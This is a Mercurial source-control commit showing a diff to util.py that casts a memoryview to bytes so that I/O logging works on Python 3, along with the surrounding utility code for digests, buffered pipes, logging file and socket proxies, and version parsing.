util: cast memoryview to bytes...
Gregory Szorc
r41429:b141b524 default
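
The change below guards fileobjectobserver.readinto(): the slice it takes of
the destination buffer can be a memoryview, but _writedata() probes the data
with the "in" operator and splitlines(). On Python 3, iterating a memoryview
yields integers rather than one-byte strings, so the b'\n' membership test
silently misses, and memoryview has no splitlines() at all. Casting to bytes
restores the expected semantics. A minimal sketch of the mismatch (standalone
Python 3, not part of the patch):

    mv = memoryview(b'line one\nline two\n')

    print(10 in mv)               # True: elements are ints (10 == ord('\n'))
    print(b'\n' in mv)            # False: an int never equals b'\n'
    print(b'\n' in mv.tobytes())  # True again once cast to bytes
    print(hasattr(mv, 'splitlines'))  # False: only bytes can split lines
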
@@ -1,4015 +1,4021 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

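# Illustration (hypothetical, editor's sketch): bitsfrom() simply ORs all
# elements together, which is how a set of bit flags is combined into one
# value.
assert bitsfrom([0b001, 0b010, 0b100]) == 0b111
assert bitsfrom([]) == 0
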
# Python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to a standard user, so detect if we are running tests
# and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]
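
# Illustration (hypothetical, editor's sketch): both the Python 2 builtin
# buffer() and the memoryview fallback above slice without copying the
# underlying data.
assert bytes(buffer(b'abcdef', 1, 3)) == b'bcd'
assert bytes(buffer(b'abcdef', 4)) == b'ef'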

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

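def _bufferedinputpipeexample():
    # Hypothetical usage sketch (editor's addition, not called anywhere):
    # readline() keeps whatever os.read() returned past the newline, and
    # hasbuffer then tells a caller to drain the buffer before polling again.
    rfd, wfd = os.pipe()
    os.write(wfd, b'first line\nsecond')
    pipe = bufferedinputpipe(os.fdopen(rfd, r'rb'))
    line = pipe.readline()   # b'first line\n'
    assert pipe.hasbuffer    # b'second' is still buffered; skip polling
    return line
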
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

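def _mmapreadexample(path):
    # Hypothetical usage sketch (editor's addition, not called anywhere):
    # mmapread() accepts anything exposing fileno() (or a raw descriptor)
    # and maps the whole file read-only; empty files come back as ''.
    with open(path, r'rb') as fp:
        data = mmapread(fp)
    return data[:]
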
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
+
+        # _writedata() uses "in" operator and is confused by memoryview because
+        # characters are ints on Python 3.
+        if isinstance(data, memoryview):
+            data = data.tobytes()
+
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

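def _loggingfileobjectexample():
    # Hypothetical usage sketch (editor's addition, not called anywhere):
    # every proxied call is mirrored to the log handle as lines like
    #   example> write(5) -> 5: hello
    #   example> read(-1) -> 5: hello
    logh = bytesio()
    fh = makeloggingfileobject(logh, bytesio(), b'example', logdata=True)
    fh.write(b'hello')
    fh.seek(0)
    fh.read()
    return logh.getvalue()
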
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None
1046 vparts, extra = m.group(1), None
1041
1047
1042 vints = []
1048 vints = []
1043 for i in vparts.split('.'):
1049 for i in vparts.split('.'):
1044 try:
1050 try:
1045 vints.append(int(i))
1051 vints.append(int(i))
1046 except ValueError:
1052 except ValueError:
1047 break
1053 break
1048 # (3, 6) -> (3, 6, None)
1054 # (3, 6) -> (3, 6, None)
1049 while len(vints) < 3:
1055 while len(vints) < 3:
1050 vints.append(None)
1056 vints.append(None)
1051
1057
1052 if n == 2:
1058 if n == 2:
1053 return (vints[0], vints[1])
1059 return (vints[0], vints[1])
1054 if n == 3:
1060 if n == 3:
1055 return (vints[0], vints[1], vints[2])
1061 return (vints[0], vints[1], vints[2])
1056 if n == 4:
1062 if n == 4:
1057 return (vints[0], vints[1], vints[2], extra)
1063 return (vints[0], vints[1], vints[2], extra)
1058
1064
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
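
# Illustrative sketch of cachefunc in use (comments only; 'expensive' is a
# hypothetical helper, not part of this module). The cache is unbounded, so
# this is only suitable for functions with a small set of possible arguments.
#
#   def expensive(rev):
#       ...  # costly computation
#   expensive = cachefunc(expensive)
#   expensive(1)   # computed
#   expensive(1)   # returned from the cache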

class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
